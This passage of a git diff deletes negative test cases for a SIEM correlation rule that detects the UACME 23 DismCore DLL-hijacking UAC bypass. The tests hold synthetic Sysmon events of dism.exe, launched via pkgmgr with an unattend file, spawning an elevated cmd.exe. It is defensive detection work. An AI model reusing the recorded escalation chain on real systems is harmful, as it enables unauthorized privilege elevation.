"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:07:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:07:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} - -expect not {"correlation_name": "UACME_23_DismCore_Hijacking"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_4.sc deleted file mode 100644 index b02cc1c6..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_4.sc +++ /dev/null @@ -1,4 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\someprocess.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\someprocess.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\someprocess.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\someprocess.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "someprocess.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} - -expect not {"correlation_name": "UACME_23_DismCore_Hijacking"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_5.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_5.sc deleted file mode 100644 index e914b146..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_5.sc +++ /dev/null @@ -1,4 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\parent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\parent.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\parent.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\parent.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "parent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} - -expect not {"correlation_name": "UACME_23_DismCore_Hijacking"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_6.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_6.sc deleted file mode 100644 index 2da30529..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_6.sc +++ /dev/null @@ -1,4 +0,0 @@ -{"action": "start", "body": 